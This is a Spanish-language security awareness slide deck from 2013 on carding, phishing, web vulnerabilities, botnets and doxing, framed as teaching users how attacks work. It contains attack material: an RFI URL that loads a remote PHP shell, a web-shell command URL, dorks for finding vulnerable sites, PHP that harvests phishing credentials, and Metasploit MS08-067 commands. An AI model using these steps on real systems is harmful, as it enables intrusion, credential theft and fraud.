1. WWW.WEBSEC.ES
WWW.CIBERENCUENTROS.ES
Mas responsabilidad y mas seguridad en tus datos |
| Seguridad INFORMATICA
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 1
2. PRESENTACION:
• Me llamo Jorge
• Me dedico a la seguridad informatica.
• Mi web personal es [WEBSEC.ES]
• Mi correo es jorge@websec.es
• Quantika14
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 2
3. MÁS RESPONSABILIDAD Y SEGURIDAD EN TUS
DATOS
• Para ser mas seguros tenemos que ser conscientes del medio que nos rodea.
• Para tener seguridad tenemos que saber nuestros sitios más débiles.
• Para ser mas responsable tenemos que saber el valor de nuestros datos y que daño
pueden causar en terceras manos.
• Para ser un usuario responsable y seguro con sus datos tiene que saber como se
realizan ataques y hasta donde se puede llegar.
• Un usuario que sepa entrar en un windows xp no lo pondrá en su negocio o en su casa.
No le pondrá a su hijo un equipo vulnerable. No tendrá contraseñas débiles. Actualizara y
será responsable y prudente con sus datos y en sus sistemas.
• Y el saber no ocupa lugar y saber esto es cada día más importante.
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 3
4. ¿QUÉ VAMOS A DAR?
1. Definiciones
2. Fraude Online
CARDING
Phishing
Pharming
3. ¿Qué son las Botnets?
4. ¿Qué es el Doxing?
5. Prueba AutoPwn + Nmap
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 4
5. DEFINICIONES
• IP: Etiqueta numérica que identifica a un sistema en la red de manera unívoca.
• DNS: Domain Name Service. Servicio de resolución de dominios. Traduce dominios a
direcciones IP.
• Virus: Software generalmente malicioso con capacidad de replicación y/o infección de
ficheros.
• Base de Datos(DB): conjunto de datos, clasificados por tablas,
columnas y registros. Aplicaciones PostgresSQL, MYSQL
• Host: Maquina conectada en un red y utiliza o da servicios.
• Puerto: es el valor que se usa, en el modelo de la capa de transporte, para distinguir entre las
múltiples aplicaciones que se pueden conectar al mismo host. Ejemplo 80 HTTP.
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 5
6. FRAUDE ONLINE – ME LO
LLEVO- YO NO SOY TONTO
CARDING &
PHISHING
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 6
7. ¿QUÉ ES EL PHREAKING?
Constante estudio de las redes telefónicas y sus ramas, para la personificación, modificación,
creación de sistemas, accesos no autorizados etc.
Podemos separar el phreaking en 2 ramas principales:
- Redes telefónicas. (Phreak clásico)
- Aparatos telefónicos. (Phreak contemporáneo)
Redes telefónicas :
Se trabaja con las redes y distintas compañías, buscando y encontrando bugs y como explotarlos.
(Como la conocida Caja Azul o lo que nos enseño nuestro querido Capitán Crunch)
Aparatos telefónicos:
Se trabaja con todo aparato telefónico, no solo móviles, sino teléfonos fijos, micrófonos y todo su
cableado. El fin de un Phreak es el mismo que un ingeniero de redes telefónicas, conocer todo el
funcionamiento de los sistemas para encontrar errores y vulnerabilidades.
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 7
8. John Draper o Capitán Crunch
• Leyenda Hacker
• Años 70, el tenia 27 años.
• La empresa Quaker Oaks comercializa
cereales ―Cap’n Crunch‖.
• En ella había un regalo, un silbato azul.
• Si tapaba con pegamento un agujero
emitía 2600 Hz.
• Construyo la ―caja azul‖, un dispositivo
capaz de reproducir el resto de tonos.
• El primer prototipo de APPLE fue
financiado con el dinero que
conseguían vendiendo las cajas azul,
Steve Jobs, Steve Wozniak y John.
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 8
9. HISTORIA SECRETA DE LOS HACKERS
INFORMÁTICOS
http://www.youtube.com/watch?v=oloOmqOCXN4
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 9
10. CARDING
• ¿Qué es?: Es el uso ilegitimo de las tarjetas de crédito de otras personas.
• Estructura de las tarjetas de crédito:
1. Son 16 dígitos divididos en 4 grupos de 4 dígitos. Del 0 al 9.
2. Los 4 primeros determinan el banco.
3. ->American Express (15 dígitos)
->VISA (13 o 16 dígitos)
->Mastercard (16 dígitos)
->Discover (16 dígitos)
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 10
11. ¿SOMOS MALOS?
• ¿Qué necesitamos?
1. Una Shell PHP en un servidor.
2. Una Fake.
3. Una lista de correos.
4. Un correo robado.
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 11
12. ¿QUIERO MI SERVIDOR? =)
• Proceso de Footprinting.
• Análisis de vulnerabilidades.
• Explotación de vulnerabilidades.
• Generación de informe… no!!!, tenemos que pensar como un maligno.
• Subir Shell.
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 12
13. FOOTPRINTING
• GOOGLE HACKING (―inurl:‖, ―filetype:sql‖…)
• Herramientas que automaticen ―Anubis‖.
• Leer el código fuente!!!
• Errores 404
• IP reverse.
• Cuwhois, robtex.
• Metadatos.
• GoLismero - enlaces.
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 13
14. GOLISMERO
• Aplicación en python
• Muestra todos los enlaces de una
web.
• Puede guardar los resultados.
• Detectar vulnerabilidades.
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 14
15. VULNERABILIDADES
• Inyección SQL.
• XSS - Cross Site Scripting(persistente o reflejada).
• Persistente: inyecta código (script, iframe) maligno.
• Reflejada: modifica valores de la web que utiliza para variables. Robo de Cookies.
• RFI (inclusión remota de archivos)
• LFI (Local file inclusion)
• FPD (Full Puth Disclosure Vulnerability)
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 15
16. INYECCIÓN SQL
• En el nivel de validación de las entradas para realizar consultar a una base de datos no
verifica o filtra bien. Y podemos inyectar código malicioso.
• Podemos escalar privilegios.
• Podemos sacar las tablas, columnas y registros de la base de datos.
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 16
18. RFI - INCLUSIÓN REMOTA DE ARCHIVOS
• Es posible debido aun error en la programación PHP, que hace que la web cargue un
determinado archivo que está contenido en una variable.
• <? include($_GET[’variable’]); ?>
• Dorks:
• inurl:/index.php?include=
• inurl:/index.php?pagina=
• Explotanción:
• http://<server>/typetest/index.php?link=http://<server>/<shellphp>
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 18
19. LFI – LOCAL FILE INCLUSIÓN
• Ejecutar código externo en la web victima.
• Subiendo un archivo malicioso a la misma.
• Nosotros usaremos una PHP SHELL.
• Digamos que LFI es que recibe un valor de entrada que recoge la variable cmd y es
ejecutado en el sistema mediante la llamada system de PHP.
• Podemos arreglarlo deshabilitando la llamada al sistema system en PHP
• Ejmplo:
• http://www.owned.com/imag/shell.php?cmd=ls
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 19
20. XSS - CROSS SITE SCRIPTING
• Usualmente no se validan correctamente los datos de entrada que son usados en
algunas aplicaciones permitiendo enviar un script malicioso a la aplicación.
• Para funcionar necesitan un punto de entrada, que suelen ser los formularios.
• A través de un ataque XSS, se puede secuestrar cuentas, cambiar
configuraciones de los usuarios, acceder a partes restringidas del sitio, modificar
el contenido del sitio, etc.
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 20
23. WORDPRESS VULN
• Permite la descarga de archivos php • <? $download_file = $_GET['download_file'];
de la plataforma poniéndola en • $split_file = xplode('/',$download_file);
peligro. Imaginaros descargar el "wp- • $split_file_num = count($split_file);
config" del cms donde se encuentra • $my_section = $split_file_num-1;
toda la configuración a la base de
• $download_file_name =
datos de nuestra web. $split_file[$my_section]; header ("Content-
type: octet/stream");
• DORKS:
• header ("Content-disposition:
• inurl:download.php?download_file= &
• attachment;
inurl:wp-content
• filename=".$download_file_name.";")
• inurl:download.php?&path= & inurl:wp- • ; header('Content-type: application/pdf');
content
• header("Content-Length:
codigo de download.php:
• ".filesize($download_file));
readfile($download_file); exit; ?>
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 23
24. ¿QUÉ ES UNA BOTNET?
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 24
25. UNA BOTNET:
• Es una colección de software robots.
• Son maquinas infectadas que realizan acciones en conjunto de una manera centralizada.
• El artífice de la botnet puede controlar todos las maquinas infectadas de una forma
remota.
• IRC, HTTP. Incluso por SMS…
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 25
26. MEDIDAS PREVENTIVAS
• Usa un firewall.
• Usa un antivirus.
• Instala programas que sólo provengan de fuentes fiables.
• Evita abrir ejecutables de correos.
• Actualiza tu sistema y programas.
• Cuidado con los fakes o scams.
• Cuidado con dispositivos de almacenamiento externos.
• No activar el auto ejecutar de las descargas de los navegadores.
• Ser prudente y precavido.
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 26
27. ESTAMOS EN UNA BOTNET???
• Usa el comando ―netstat‖: netstat –na conexiones entrantes
• Si el internet te va lento. Examina el trafico.
• Pasa un antivirus.
• Formatea.
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 27
28. ¿QUÉ ES UN FAKE?
• Es una web clon de una pagina oficial con la intención
de robar los datos de un login (usuario, password, pin,
credenciales, etc)
• Es una técnica de phishing. Suelen engañarnos
atreves de correos o desde las redes sociales,
utilizando la ingeniería social.
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 28
29. EJEMPLO DE FAKE 1
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 29
30. EJEMPLO DE FAKE 2
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 30
31. DETRÁS EN PHP
• <?php
• $login=$_POST["nombre"];
• $pass=$_POST["password"];
• $guardar = fopen("pass.txt",a); // funcion fopen abre el archivo pass.txt
• /* La funcion fopen tiene diferentes modos a= abre el archivo solo cuando se escribe, a+=abre
el archivo cuando se lee y se escribe*/
• fwrite($guardar,"
• usuario: ".$login."
• password: ".$pass);
• fclose($guardar); //cierra fopen
• echo "<META HTTP-EQUIV='refresh' CONTENT='1; url=http://websec.es'>";
• ?>
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 31
33. ¿QUÉ ES EL DOXING?
• Es el proceso de obtención de
información acerca de una persona a
través de fuentes de internet.
• Deriva de ―Document‖ y ―ing‖;
documentando.
• El sujeto o entidad de la búsqueda y
revelación de datos e información es
―TARGET‖
• El doxer para encontrar toda la
información posible es incluso de entrar
en base de datos gubernamentales o
viajar a la ciudad del objetivo.
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 33
34. METASPLOIT INTRUSIÓN WINDOWS XP SP3
NETAPI
• use windows/smb/ms08_067_netapi
• Show options
• Set RHOST ―ipvictima‖
• set payload windows/vncinject/bind_tcp
• Set lport 4444
• EXPLOIT
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 34